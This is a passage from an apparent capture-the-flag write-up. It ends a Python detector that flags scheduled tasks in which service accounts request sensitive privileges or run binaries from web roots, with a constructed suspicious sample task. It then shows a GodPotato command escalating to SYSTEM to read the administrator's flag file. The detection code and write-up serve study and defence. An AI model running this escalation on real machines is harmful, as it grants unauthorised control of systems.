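    """Return the reasons a task definition looks like a privilege-restoration task (empty = benign)."""
    root = ET.fromstring(task_xml)
    reasons: list[str] = []
    for principal in root.iter(TASK_NS + "Principal"):
        user = _text(principal, "UserId").upper()
        requested = {p.text.strip() for p in principal.iter(TASK_NS + "Privilege") if p.text}
        sensitive = requested & SENSITIVE_PRIVILEGES
        if user in SERVICE_ACCOUNTS and sensitive:
            reasons.append(f"principal {user} requests {', '.join(sorted(sensitive))}")
    for action in root.iter(TASK_NS + "Exec"):
        command = _text(action, "Command")
        if any(marker in command.lower() for marker in WEB_ROOT_MARKERS):
            reasons.append(f"action runs a binary from a web root: {command}")
    return reasons


def scan_events(events: list[dict]) -> list[TaskAlert]:
    """Run the check over 4698 records; other event IDs are ignored."""
    alerts: list[TaskAlert] = []
    for event in events:
        if event.get("EventID") != 4698:
            continue
        reasons = analyze_task_xml(event["TaskContent"])
        if reasons:
            alerts.append(TaskAlert(event["TaskName"], event["SubjectUserName"], reasons))
    return alerts


# --- constructed sample events (not logs taken from the box) ----------------------------
SUSPICIOUS_TASK_XML = r"""<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-19</UserId>
      <LogonType>ServiceAccount</LogonType>
      <RequiredPrivileges>
        <Privilege>SeChangeNotifyPrivilege</Privilege>
        <Privilege>SeCreateGlobalPrivilege</Privilege>
        <Privilege>SeImpersonatePrivilege</Privilege>
      </RequiredPrivileges>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\xampp\htdocs\a4446.exe</Command>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK_XML = r"""<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals>
    <Principal id="Author">
      <UserId>VISUAL\enox</UserId>
      <LogonType>InteractiveToken</LogonType>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\cleanmgr.exe</Command>
    </Exec>
  </Actions>
</Task>"""

SAMPLE_EVENTS = [
    {"EventID": 4698, "SubjectUserName": "enox", "TaskName": "\\DiskCleanup", "TaskContent": BENIGN_TASK_XML},
    {"EventID": 4702, "SubjectUserName": "enox", "TaskName": "\\DiskCleanup", "TaskContent": BENIGN_TASK_XML},
    {"EventID": 4698, "SubjectUserName": "enox", "TaskName": "\\SomeTask12", "TaskContent": SUSPICIOUS_TASK_XML},
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(f"{alert.task_name} created by {alert.created_by}:")
        for reason in alert.reasons:
            print("  -", reason)
```

Both conditions fire on the sample task, so the alert carries two reasons; the benign cleanup task created by the same user is not reported, and the 4702 update event is skipped. A service account asking to regain a privilege it was deliberately stripped of is rare in legitimate tasks, which makes the principal check a low-noise rule on its own.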

Escalating to SYSTEM

There are many ways to go from SeImpersonatePrivilege to SYSTEM; I didn't try any others and used the GodPotato from the writeup directly.

GodPotato-NET4.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\root.txt"

Summary

  • If I had to pair "breakpoint" in a couplet, I think "deadline" would make a fine match.
  • Learning without thinking is labour lost; thinking without learning is perilous.